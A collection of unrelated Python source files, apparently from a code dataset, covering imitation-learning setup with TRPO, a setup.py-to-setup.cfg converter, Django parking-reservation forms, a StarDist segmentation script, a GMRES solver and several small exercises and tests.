optimizer=tf.train.RMSPropOptimizer(args.critic_learning_rate), n_train_epochs=args.n_critic_train_epochs, summary_writer=writer, grad_norm_rescale=args.critic_grad_rescale, verbose=2, debug_nan=True ) return critic def build_policy(args, env, latent_sampler=None): if args.use_infogail: if latent_sampler is None: latent_sampler = UniformlyRandomLatentSampler( scheduler=ConstantIntervalScheduler(k=args.scheduler_k), name='latent_sampler', dim=args.latent_dim ) if args.policy_recurrent: policy = GaussianLatentVarGRUPolicy( name="policy", latent_sampler=latent_sampler, env_spec=env.spec, hidden_dim=args.recurrent_hidden_dim, ) else: print("GaussianLatentVarMLPPolicy") policy = GaussianLatentVarMLPPolicy( name="policy", latent_sampler=latent_sampler, env_spec=env.spec, hidden_sizes=args.policy_mean_hidden_layer_dims, std_hidden_sizes=args.policy_std_hidden_layer_dims ) else: if args.policy_recurrent: print("GaussianGRUPolicy") policy = GaussianGRUPolicy( name="policy", env_spec=env.spec, hidden_dim=args.recurrent_hidden_dim, output_nonlinearity=None, learn_std=True ) else: print("GaussianMLPPolicy") policy = GaussianMLPPolicy( name="policy", env_spec=env.spec, hidden_sizes=args.policy_mean_hidden_layer_dims, std_hidden_sizes=args.policy_std_hidden_layer_dims, adaptive_std=True, output_nonlinearity=None, learn_std=True ) return policy def build_recognition_model(args, env, writer=None): if args.use_infogail: recognition_dataset = RecognitionDataset( args.batch_size, flat_recurrent=args.policy_recurrent ) recognition_network = ObservationActionMLP( name='recog', hidden_layer_dims=args.recognition_hidden_layer_dims, output_dim=args.latent_dim ) recognition_model = RecognitionModel( obs_dim=env.observation_space.flat_dim, act_dim=env.action_space.flat_dim, dataset=recognition_dataset, network=recognition_network, variable_type='categorical', latent_dim=args.latent_dim, optimizer=tf.train.AdamOptimizer(args.recognition_learning_rate), n_train_epochs=args.n_recognition_train_epochs, summary_writer=writer, verbose=2 ) else: recognition_model = None return recognition_model def build_baseline(args, env): return GaussianMLPBaseline(env_spec=env.spec) def build_reward_handler(args, writer=None): reward_handler = hgail.misc.utils.RewardHandler( use_env_rewards=args.reward_handler_use_env_rewards, max_epochs=args.reward_handler_max_epochs, # epoch at which final scales are used critic_final_scale=args.reward_handler_critic_final_scale, recognition_initial_scale=0., recognition_final_scale=args.reward_handler_recognition_final_scale, summary_writer=writer, normalize_rewards=True, critic_clip_low=-100, critic_clip_high=100, ) return reward_handler def build_hierarchy(args, env, writer=None): levels = [] latent_sampler = UniformlyRandomLatentSampler( name='base_latent_sampler', dim=args.latent_dim, scheduler=ConstantIntervalScheduler(k=args.env_H) ) for level_idx in [1,0]: # wrap env in different spec depending on level if level_idx == 0: level_env = env else: level_env = SpecWrapperEnv( env, action_space=Discrete(args.latent_dim), observation_space=env.observation_space ) with tf.variable_scope('level_{}'.format(level_idx)): # recognition_model = build_recognition_model(args, level_env, writer) recognition_model = None if level_idx == 0: policy = build_policy(args, env, latent_sampler=latent_sampler) else: scheduler = ConstantIntervalScheduler(k=args.scheduler_k) policy = latent_sampler = CategoricalLatentSampler( scheduler=scheduler, name='latent_sampler', policy_name='latent_sampler_policy', dim=args.latent_dim, env_spec=level_env.spec, latent_sampler=latent_sampler, max_n_envs=args.n_envs ) baseline = build_baseline(args, level_env) if args.vectorize: force_batch_sampler = False if level_idx == 0: sampler_args = dict(n_envs=args.n_envs) else: sampler_args = None else: force_batch_sampler = True sampler_args = None sampler_cls = None if level_idx == 0 else HierarchySampler algo = TRPO( env=level_env, policy=policy, baseline=baseline, batch_size=args.batch_size, max_path_length=args.max_path_length, n_itr=args.n_itr, discount=args.discount, step_size=args.trpo_step_size, sampler_cls=sampler_cls, force_batch_sampler=force_batch_sampler, sampler_args=sampler_args, optimizer_args=dict( max_backtracks=50, debug_nan=True ) ) reward_handler = build_reward_handler(args, writer) level = Level( depth=level_idx, algo=algo, reward_handler=reward_handler, recognition_model=recognition_model, start_itr=0, end_itr=0 if level_idx == 0 else np.inf ) levels.append(level) # by convention the order of the levels should be increasing # but they must be built in the reverse order # so reverse the list before returning it return list(reversed(levels)) ''' setup ''' def latest_snapshot(exp_dir, phase='train'): snapshot_dir = os.path.join(exp_dir, phase, 'log') snapshots = glob.glob('{}/itr_*.pkl'.format(snapshot_dir)) latest = sorted(snapshots, reverse=True)[0] return latest def set_up_experiment( exp_name, phase, exp_home='../../data/experiments/', snapshot_gap=5): maybe_mkdir(exp_home) exp_dir = os.path.join(exp_home, exp_name) maybe_mkdir(exp_dir) phase_dir = os.path.join(exp_dir, phase) maybe_mkdir(phase_dir) log_dir = os.path.join(phase_dir, 'log') maybe_mkdir(log_dir) logger.set_snapshot_dir(log_dir) logger.set_snapshot_mode('gap') logger.set_snapshot_gap(snapshot_gap) log_filepath = os.path.join(log_dir, 'log.txt') logger.add_text_output(log_filepath) return exp_dir ''' data utilities ''' def compute_lengths(arr): sums = np.sum(np.array(arr), axis=2) lengths = [] for sample in sums: zero_idxs = np.where(sample == 0.)[0] if len(zero_idxs) == 0: lengths.append(len(sample)) else: lengths.append(zero_idxs[0]) return np.array(lengths) def normalize(x, clip_std_multiple=np.inf): mean = np.mean(x, axis=0, keepdims=True) x = x - mean std = np.std(x, axis=0, keepdims=True) + 1e-8 up = std * clip_std_multiple lb = - std * clip_std_multiple x = np.clip(x, lb, up) x = x / std return x, mean, std def normalize_range(x, low, high): low = np.array(low) high = np.array(high) mean = (high + low) / 2. half_range = (high - low) / 2. x = (x - mean) / half_range x = np.clip(x, -1, 1) return x def load_x_feature_names(filepath, ngsim_filename): print(filepath) f = h5py.File(filepath, 'r') xs = [] traj_id = NGSIM_FILENAME_TO_ID[ngsim_filename] # in case this nees to allow for multiple files in the future traj_ids = [traj_id] for i in traj_ids: if str(i) in f.keys(): xs.append(f[str(i)]) else: raise ValueError('invalid key to trajectory data: {}'.format(i)) x = np.concatenate(xs) feature_names = f.attrs['feature_names'] return x, feature_names def load_data( filepath, act_keys=['accel', 'turn_rate_global'], ngsim_filename='trajdata_i101_trajectories-0750am-0805am.txt', debug_size=None, min_length=50, normalize_data=True, shuffle=False, act_low=-1, act_high=1, clip_std_multiple=np.inf): # loading varies based on dataset type x, feature_names = load_x_feature_names(filepath, ngsim_filename) # optionally keep it to a reasonable size if debug_size is not None: x = x[:debug_size] if shuffle: idxs = np.random.permutation(len(x)) x = x[idxs] # compute lengths of the samples before anything else b/c this is fragile lengths = compute_lengths(x) # flatten the dataset to (n_samples, n_features) # taking only the valid timesteps from each sample # i.e., throw out timeseries information xs = [] for i, l in enumerate(lengths): # enforce minimum length constraint if l >= min_length: xs.append(x[i,:l]) x = np.concatenate(xs) # split into observations and actions # redundant because the environment is not able to extract actions obs = x act_idxs = [i for (i,n) in enumerate(feature_names) if n in act_keys] act = x[:, act_idxs] if normalize_data: # normalize it all, _no_ test / val split obs, obs_mean, obs_std = normalize(obs, clip_std_multiple) # normalize actions to between -1 and 1 act = normalize_range(act, act_low, act_high) else: obs_mean = None obs_std = None return dict( observations=obs, actions=act, obs_mean=obs_mean, obs_std=obs_std, )
1.414063
1
setup_py_upgrade.py
asottile/setup-py-upgrade
87
11090
<reponame>asottile/setup-py-upgrade<filename>setup_py_upgrade.py import argparse import ast import configparser import io import os.path from typing import Any from typing import Dict from typing import Optional from typing import Sequence METADATA_KEYS = frozenset(( 'name', 'version', 'url', 'download_url', 'project_urls', 'author', 'author_email', 'maintainer', 'maintainer_email', 'classifiers', 'license', 'license_file', 'description', 'long_description', 'long_description_content_type', 'keywords', 'platforms', 'provides', 'requires', 'obsoletes', )) OPTIONS_AS_SECTIONS = ( 'entry_points', 'extras_require', 'package_data', 'exclude_package_data', ) OPTIONS_KEYS = frozenset(( 'zip_safe', 'setup_requires', 'install_requires', 'python_requires', 'use_2to3', 'use_2to3_fixers', 'use_2to3_exclude_fixers', 'convert_2to3_doctests', 'scripts', 'eager_resources', 'dependency_links', 'tests_require', 'include_package_data', 'packages', 'package_dir', 'namespace_packages', 'py_modules', 'data_files', # need special processing (as sections) *OPTIONS_AS_SECTIONS, )) FIND_PACKAGES_ARGS = ('where', 'exclude', 'include') def is_setuptools_attr_call(node: ast.Call, attr: str) -> bool: return ( # X( (isinstance(node.func, ast.Name) and node.func.id == attr) or # setuptools.X( ( isinstance(node.func, ast.Attribute) and isinstance(node.func.value, ast.Name) and node.func.value.id == 'setuptools' and node.func.attr == attr ) ) class Visitor(ast.NodeVisitor): def __init__(self) -> None: self.sections: Dict[str, Dict[str, Any]] = {} self.sections['metadata'] = {} self.sections['options'] = {} self._files: Dict[str, str] = {} def visit_With(self, node: ast.With) -> None: # with open("filename", ...) as fvar: # varname = fvar.read() if ( # with open(...) len(node.items) == 1 and isinstance(node.items[0].context_expr, ast.Call) and isinstance(node.items[0].context_expr.func, ast.Name) and node.items[0].context_expr.func.id == 'open' and # "filename" len(node.items[0].context_expr.args) > 0 and isinstance(node.items[0].context_expr.args[0], ast.Str) and # as fvar isinstance(node.items[0].optional_vars, ast.Name) and # varname = len(node.body) == 1 and isinstance(node.body[0], ast.Assign) and len(node.body[0].targets) == 1 and isinstance(node.body[0].targets[0], ast.Name) and # fvar.read() isinstance(node.body[0].value, ast.Call) and isinstance(node.body[0].value.func, ast.Attribute) and # .read() node.body[0].value.func.attr == 'read' and # fvar. isinstance(node.body[0].value.func.value, ast.Name) and ( node.body[0].value.func.value.id == node.items[0].optional_vars.id ) ): varname = node.body[0].targets[0].id filename = node.items[0].context_expr.args[0].s self._files[varname] = filename self.generic_visit(node) def visit_Call(self, node: ast.Call) -> None: if is_setuptools_attr_call(node, 'setup'): for kwd in node.keywords: if kwd.arg in METADATA_KEYS: section = 'metadata' elif kwd.arg in OPTIONS_KEYS: section = 'options' else: raise SystemExit( f'{kwd.arg}= is not supported in setup.cfg', ) if ( isinstance(kwd.value, ast.Name) and kwd.value.id in self._files ): value = f'file: {self._files[kwd.value.id]}' elif ( isinstance(kwd.value, ast.Call) and is_setuptools_attr_call(kwd.value, 'find_packages') ): find_section = { k: ast.literal_eval(v) for k, v in zip(FIND_PACKAGES_ARGS, kwd.value.args) } find_section.update({ kwd.arg: ast.literal_eval(kwd.value) for kwd in kwd.value.keywords if kwd.arg is not None # for mypy's sake }) self.sections['options.packages.find'] = find_section value = 'find:' else: try: value = ast.literal_eval(kwd.value) except ValueError: raise NotImplementedError(f'unparsable: {kwd.arg}=') self.sections[section][kwd.arg] = value self.generic_visit(node) def _list_as_str(lst: Sequence[str]) -> str: if len(lst) == 1: return lst[0] else: return '\n' + '\n'.join(lst) def _dict_as_str(dct: Dict[str, str]) -> str: return _list_as_str([f'{k}={v}' for k, v in dct.items()]) def _reformat(section: Dict[str, Any]) -> Dict[str, Any]: new_section = {} for key, value in section.items(): if isinstance(value, (list, tuple)): new_section[key] = _list_as_str(value) elif isinstance(value, dict): new_section[key] = _dict_as_str(value) else: new_section[key] = value return new_section def main(argv: Optional[Sequence[str]] = None) -> int: parser = argparse.ArgumentParser() parser.add_argument('directory') args = parser.parse_args(argv) setup_py = os.path.join(args.directory, 'setup.py') with open(setup_py, 'rb') as setup_py_f: tree = ast.parse(setup_py_f.read(), filename=setup_py) visitor = Visitor() visitor.visit(tree) for option_section in OPTIONS_AS_SECTIONS: if option_section in visitor.sections['options']: section = visitor.sections['options'].pop(option_section) visitor.sections[f'options.{option_section}'] = section for k in tuple(visitor.sections.get('options.extras_require', {})): if k.startswith(':'): deps = visitor.sections['options.extras_require'].pop(k) ir = visitor.sections['options'].setdefault('install_requires', []) for dep in deps: ir.append(f'{dep};{k[1:]}') sections = {k: _reformat(v) for k, v in visitor.sections.items() if v} # always want these to start with a newline for section in ('entry_points', 'package_data', 'exclude_package_data'): for k, v in dict(sections.get(f'options.{section}', {})).items(): if '\n' not in v: if k == '': sections[f'options.{section}'].pop(k) k = '*' sections[f'options.{section}'][k] = f'\n{v}' # always start project_urls with a newline as well if sections.get('metadata', {}).get('project_urls'): project_urls = sections['metadata']['project_urls'] if not project_urls.startswith('\n'): sections['metadata']['project_urls'] = f'\n{project_urls}' cfg = configparser.ConfigParser() cfg.update(sections) setup_cfg = os.path.join(args.directory, 'setup.cfg') if os.path.exists(setup_cfg): orig = configparser.ConfigParser() orig.read(setup_cfg) for section_name, section in orig.items(): for k, v in section.items(): # a shame `setdefault(...)` doesn't work if not cfg.has_section(section_name): cfg.add_section(section_name) cfg[section_name][k] = v with open(setup_py, 'w') as f: f.write('from setuptools import setup\nsetup()\n') sio = io.StringIO() cfg.write(sio) with open(setup_cfg, 'w') as f: contents = sio.getvalue().strip() + '\n' contents = contents.replace('\t', ' ') contents = contents.replace(' \n', '\n') f.write(contents) print(f'{setup_py} and {setup_cfg} written!') return 0 if __name__ == '__main__': raise SystemExit(main())
1.835938
2
main/models/__init__.py
prajnamort/LambdaOJ2
2
11091
<gh_stars>1-10 from .user import User, MultiUserUpload from .problem import Problem, TestData from .submit import Submit
0.976563
1
2019/tests/test_Advent2019_10.py
davidxbuck/advent2018
1
11092
<reponame>davidxbuck/advent2018<gh_stars>1-10 # pytest tests import numpy as np from Advent2019_10 import Day10 class TestDay10(): def test_instantiate(self): test = Day10('../tests/test_Advent2019_10a.txt') grid = ['.#..#', '.....', '#####', '....#', '...##'] grid = [list(x) for x in grid] gridarray = np.array(grid).transpose() boolgrid = (gridarray == "#") assert (gridarray[3, :] == list('..#.#')).all() assert (gridarray[:, 2] == list('#####')).all() assert (boolgrid[:, 2] == [True, True, True, True, True]).all() assert (test.asteroid_map == gridarray).all() assert (test.boolean_asteroid_map == boolgrid).all()
2.71875
3
Hash Map/448. Find All Numbers Disappeared in an Array.py
xli1110/LC
2
11093
<reponame>xli1110/LC class Solution: def findDisappearedNumbers(self, nums: List[int]) -> List[int]: if len(nums) < 1: raise Exception("Invalid Array") n = len(nums) res = [] s = set() for x in nums: s.add(x) for i in range(1, n + 1): if i not in s: res.append(i) return res
3.171875
3
tests/test_demo.py
aaronestrada/flask-restplus-swagger-relative
3
11094
<gh_stars>1-10 import pytest from tests.test_application import app @pytest.fixture def client(): client = app.test_client() yield client def test_hello_resource(client): """ Test if it is possible to access to /hello resource :param client: Test client object :return: """ response = client.get('/hello').get_json() assert response['hello'] == 'world' def test_asset_found(client): """ Test if Swagger assets are accessible from the new path :param client: Test client object :return: """ response = client.get('/this_is_a_new/path_for_swagger_internal_documentation/swaggerui/swagger-ui-bundle.js') assert response.status_code is 200
2.484375
2
01_Introduction to Python/3-functions-and-packages/03_multiple-arguments.py
mohd-faizy/DataScience-With-Python
5
11095
<filename>01_Introduction to Python/3-functions-and-packages/03_multiple-arguments.py ''' 03 - Multiple arguments In the previous exercise, the square brackets around imag in the documentation showed us that the imag argument is optional. But Python also uses a different way to tell users about arguments being optional. Have a look at the documentation of sorted() by typing help(sorted) in the IPython Shell. You'll see that sorted() takes three arguments: iterable, key and reverse. key=None means that if you don't specify the key argument, it will be None. reverse=False means that if you don't specify the reverse argument, it will be False. In this exercise, you'll only have to specify iterable and reverse, not key. The first input you pass to sorted() will be matched to the iterable argument, but what about the second input? To tell Python you want to specify reverse without changing anything about key, you can use =: sorted(___, reverse = ___) Two lists have been created for you on the right. Can you paste them together and sort them in descending order? Note: For now, we can understand an iterable as being any collection of objects, e.g. a List. Instructions: - Use + to merge the contents of first and second into a new list: full. - Call sorted() on full and specify the reverse argument to be True. Save the sorted list as full_sorted. - Finish off by printing out full_sorted. ''' # Create lists first and second first = [11.25, 18.0, 20.0] second = [10.75, 9.50] # Paste together first and second: full full = first + second # Sort full in descending order: full_sorted full_sorted = sorted(full, reverse=True) # Print out full_sorted print(full_sorted)
4.6875
5
Taller_Algoritmos_02/Ejercicio_10.py
Angelio01/algoritmos_programacion-
0
11096
<reponame>Angelio01/algoritmos_programacion- """ Entradas: 3 Valores flotantes que son el valor de diferentes monedas Chelines autriacos --> float --> x Dramas griegos --> float --> z Pesetas --> float --> w Salidas 4 valores flotantes que es la conversión de las anteriores monedas Pesetas --> float --> x Francos franceses --> float --> z Dolares --> float --> a Liras italianas --> float --> b """ # Entradas x1 = float(input("Dime los chelines autríacos\n")) z1 = float(input("Dime los dracmas griegos\n")) w = float(input("Dime las pesetas\n")) # Caja negra x = (x1 * 956871)/100 z = z1/22.64572381 a = w/122499 b = (w*100)/9289 # Salidas print(f"\n{x1} Chelines austríacos en pesetas son {x}\n{z1} Dracmas griegos en Francos franceses son {z}\n{w} Pesetas en Dolares son {a}\n{w} Pesetas en Liras italianas son {b}\n")
3.921875
4
stardist/stardist_impl/predict_stardist_3d.py
constantinpape/deep-cell
0
11097
import argparse import os from glob import glob import imageio from tqdm import tqdm from csbdeep.utils import normalize from stardist.models import StarDist3D def get_image_files(root, image_folder, ext): # get the image and label mask paths and validate them image_pattern = os.path.join(root, image_folder, f'*{ext}') print("Looking for images with the pattern", image_pattern) images = glob(image_pattern) assert len(images) > 0, "Did not find any images" images.sort() return images # could be done more efficiently, see # https://github.com/hci-unihd/batchlib/blob/master/batchlib/segmentation/stardist_prediction.py def run_prediction(image_files, model_path, root, prediction_folder): # load the model model_root, model_name = os.path.split(model_path.rstrip('/')) model = StarDist3D(None, name=model_name, basedir=model_root) res_folder = os.path.join(root, prediction_folder) os.makedirs(res_folder, exist_ok=True) # normalization parameters: lower and upper percentile used for image normalization # maybe these should be exposed lower_percentile = 1 upper_percentile = 99.8 ax_norm = (0, 1, 2) for im_file in tqdm(image_files, desc="run stardist prediction"): im = imageio.volread(im_file) im = normalize(im, lower_percentile, upper_percentile, axis=ax_norm) pred, _ = model.predict_instances(im) im_name = os.path.split(im_file)[1] save_path = os.path.join(res_folder, im_name) imageio.imsave(save_path, pred) def predict_stardist(root, model_path, image_folder, prediction_folder, ext): print("Loading images") image_files = get_image_files(root, image_folder, ext) print("Found", len(image_files), "images for prediction") print("Start prediction ...") run_prediction(image_files, model_path, root, prediction_folder) print("Finished prediction") def main(): parser = argparse.ArgumentParser(description="Predict new images with a stardist model") parser.add_argument('root', type=str, help="Root folder with image data.") parser.add_argument('model_path', type=str, help="Where the model is saved.") parser.add_argument('--image_folder', type=str, default='images', help="Name of the folder with the training images, default: images.") parser.add_argument('--prediction_folder', type=str, default='predictions', help="Name of the folder where the predictions should be stored, default: predictions.") parser.add_argument('--ext', type=str, default='.tif', help="Image file extension, default: .tif") args = parser.parse_args() predict_stardist(args.root, args.model_path, args.image_folder, args.prediction_folder, args.ext) if __name__ == '__main__': main()
2.4375
2
estacionamientos/forms.py
ShadowManu/SAGE
0
11098
<reponame>ShadowManu/SAGE<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 -*- from django import forms from estacionamientos.models import Estacionamiento, Reserva, Pago class EstacionamientosForm(forms.ModelForm): nombre_duenio = forms.CharField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Nombre del Dueño'})) nombre_est = forms.CharField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Nombre del Estacionamiento'})) direccion = forms.CharField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Dirección'})) telefono1 = forms.IntegerField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Teléfono 1',})) telefono2 = forms.IntegerField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Telefono 2',}), required=False) telefono3 = forms.IntegerField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Teléfono 3',}), required=False) email1 = forms.EmailField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Correo Electrónico 1',})) email2 = forms.EmailField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Correo Electrónico 2',}), required=False) email3 = forms.EmailField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Correo Electrónico 3',}), required=False) rif = forms.IntegerField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'RIF',})) capacidad = forms.IntegerField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Capacidad',})) tarifa = forms.DecimalField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Tarifa',})) horaI = forms.TimeField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Hora Apertura',})) horaF = forms.TimeField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Hora Cierre',})) reservaI = forms.TimeField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Inicio Restringir Reserva',}), required=False) reservaF = forms.TimeField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Fin Restringir Reserva',}), required=False) class Meta: model = Estacionamiento fields = '__all__' class ReservaForm(forms.ModelForm): estacionamiento = forms.ModelChoiceField( queryset=Estacionamiento.objects.all(), empty_label="Estacionamiento", widget=forms.Select(attrs={'class': 'form-control',})) horaInicio = forms.TimeField(widget=forms.DateInput( attrs={'class': 'form-control', 'placeholder': 'Inicio de la Reserva',})) horaFin = forms.TimeField(widget=forms.DateInput( attrs={'class': 'form-control', 'placeholder': 'Fin de la Reserva',})) class Meta: model = Reserva fields = ['horaInicio', 'horaFin', 'estacionamiento'] class PagoForm(forms.ModelForm): TARJETAS = [ ('', 'Tipo de Tarjeta'), ('Vista', 'Vista'), ('Mister', 'Mister'), ('Xpres', 'Xpres') ] nombre = forms.CharField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Nombre',})) cedula = forms.IntegerField(widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Cédula',})) tipoTarjeta = forms.ChoiceField(choices=TARJETAS, widget=forms.Select(attrs={'class': 'form-control'})) numeroTarjeta = forms.RegexField(min_length=16, max_length=16, regex=r'^(\d)+$', error_message = ("Número de tarjeta no válido."), widget=forms.TextInput( attrs={'class': 'form-control', 'placeholder': 'Número de Tarjeta',})) class Meta: model = Pago fields = ['nombre', 'cedula', 'tipoTarjeta', 'numeroTarjeta', 'pago']
2.046875
2
src/krylov/gmres.py
nschloe/krylov
36
11099
<gh_stars>10-100 """ <NAME>, <NAME>, GMRES: a generalized minimal residual algorithm for solving nonsymmetric linear systems, SIAM J. Sci. and Stat. Comput., 7(3), 856–869, 1986, <https://doi.org/10.1137/0907058>. Other implementations: <https://petsc.org/release/docs/manualpages/KSP/KSPGMRES.html> """ from __future__ import annotations from typing import Callable import numpy as np import scipy.linalg from numpy.typing import ArrayLike from ._helpers import ( Identity, Info, LinearOperator, Product, assert_correct_shapes, clip_imag, get_default_inner, wrap_inner, ) from .arnoldi import ArnoldiHouseholder, ArnoldiMGS from .givens import givens def multi_matmul(A, b): """A @ b for many A, b (i.e., A.shape == (m,n,...), y.shape == (n,...))""" return np.einsum("ij...,j...->i...", A, b) def multi_solve_triangular(A, B): """This function calls scipy.linalg.solve_triangular for every single A. A vectorized version would be much better here. """ A_shape = A.shape a = A.reshape(A.shape[0], A.shape[1], -1) b = B.reshape(B.shape[0], -1) y = [] for k in range(a.shape[2]): if np.all(b[:, k] == 0.0): y.append(np.zeros(b[:, k].shape)) else: y.append(scipy.linalg.solve_triangular(a[:, :, k], b[:, k])) y = np.array(y).T.reshape([A_shape[0]] + list(A_shape[2:])) return y def gmres( *args, restart_size: int | None = None, maxiter: int | None = None, x0: ArrayLike | None = None, **kwargs, ) -> tuple[np.ndarray | None, Info]: if restart_size is None: return _gmres(*args, maxiter=maxiter, x0=x0, **kwargs) total_steps = 0 info = None while True: sol, info = _gmres( *args, maxiter=restart_size if maxiter is None else min(restart_size, maxiter - total_steps), x0=x0 if info is None else info.xk, **kwargs, ) total_steps += info.numsteps if info.success: break # override numsteps info = Info(info.success, info.xk, total_steps, info.resnorms, info.nresnorms) return sol, info def _gmres( A: LinearOperator, b: ArrayLike, M: LinearOperator | None = None, Ml: LinearOperator | None = None, Mr: LinearOperator | None = None, inner: Callable | None = None, ortho: str = "mgs", x0: ArrayLike | None = None, tol: float = 1e-5, atol: float = 1.0e-15, maxiter: int | None = None, callback: Callable[[int, np.ndarray, list[np.ndarray]], None] | None = None, ) -> tuple[np.ndarray | None, Info]: b = np.asarray(b) assert_correct_shapes(A, b, x0) n = A.shape[0] M = Identity(n) if M is None else M Ml = Identity(n) if Ml is None else Ml Mr = Identity(n) if Mr is None else Mr def _get_xk(y): if y is None: return x0 k = arnoldi.iter if k > 0: yy = multi_solve_triangular(R[:k, :k], y) # The last is always 0, so we could skip it, too # yk = sum(c * v for c, v in zip(yy, V[:-1])) yk = sum(c * v for c, v in zip(yy, arnoldi.V)) return x0 + Mr @ yk return x0 _inner = get_default_inner(b.shape) if inner is None else wrap_inner(inner) maxiter = A.shape[0] if maxiter is None else maxiter if x0 is None: x0 = np.zeros_like(b) Ml_r0 = Ml @ b else: x0 = np.asarray(x0) Ml_r0 = Ml @ (b - A @ x0) M_Ml_r0 = M @ Ml_r0 M_Ml_r0_norm = np.sqrt(clip_imag(_inner(Ml_r0, M_Ml_r0))) Ml_A_Mr = Product(Ml, A, Mr) resnorms = [M_Ml_r0_norm] if callback is not None: callback(0, x0, resnorms) # initialize Arnoldi if ortho.startswith("mgs"): num_reorthos = 1 if len(ortho) == 3 else int(ortho[3:]) arnoldi = ArnoldiMGS( Ml_A_Mr, Ml_r0, num_reorthos=num_reorthos, M=M, Mv=M_Ml_r0, Mv_norm=M_Ml_r0_norm, inner=_inner, ) else: assert ortho == "householder" assert inner is None assert isinstance(M, Identity) arnoldi = ArnoldiHouseholder(Ml_A_Mr, Ml_r0) # Givens rotations: G = [] # QR decomposition of Hessenberg matrix via Givens and R dtype = M_Ml_r0.dtype R = np.zeros([maxiter + 1, maxiter] + list(b.shape[1:]), dtype=dtype) y = np.zeros([maxiter + 1] + list(b.shape[1:]), dtype=dtype) # Right-hand side of projected system: y[0] = M_Ml_r0_norm yk = None xk = None # iterate Arnoldi k = 0 success = False reason = None criterion = np.maximum(tol * resnorms[0], atol) while True: if np.all(resnorms[-1] <= criterion): # oh really? xk = _get_xk(yk) if xk is None else xk Ml_r = Ml @ (b - A @ xk) resnorms[-1] = np.sqrt(clip_imag(_inner(Ml_r, M @ Ml_r))) if np.all(resnorms[-1] <= criterion): success = True break if k == maxiter: reason = "maxiter reached" break # V is used in _get_xk() _, h = next(arnoldi) # Copy new column from Arnoldi R[: k + 2, k] = h[: k + 2] # Apply previous Givens rotations. for i in range(k): R[i : i + 2, k] = multi_matmul(G[i], R[i : i + 2, k]) # Compute and apply new Givens rotation. g, r = givens(R[k : k + 2, k]) G.append(g) R[k, k] = r R[k + 1, k] = 0.0 y[k : k + 2] = multi_matmul(G[k], y[k : k + 2]) yk = y[: k + 1] resnorm = np.abs(y[k + 1]) xk = None if callback is not None: xk = _get_xk(yk) if xk is None else xk callback(k + 1, xk, resnorms) resnorms.append(resnorm) k += 1 # compute solution if not yet done if xk is None: xk = _get_xk(y[: arnoldi.iter]) return xk if success else None, Info( success, xk, k, np.array(resnorms), reason=reason )
2.71875
3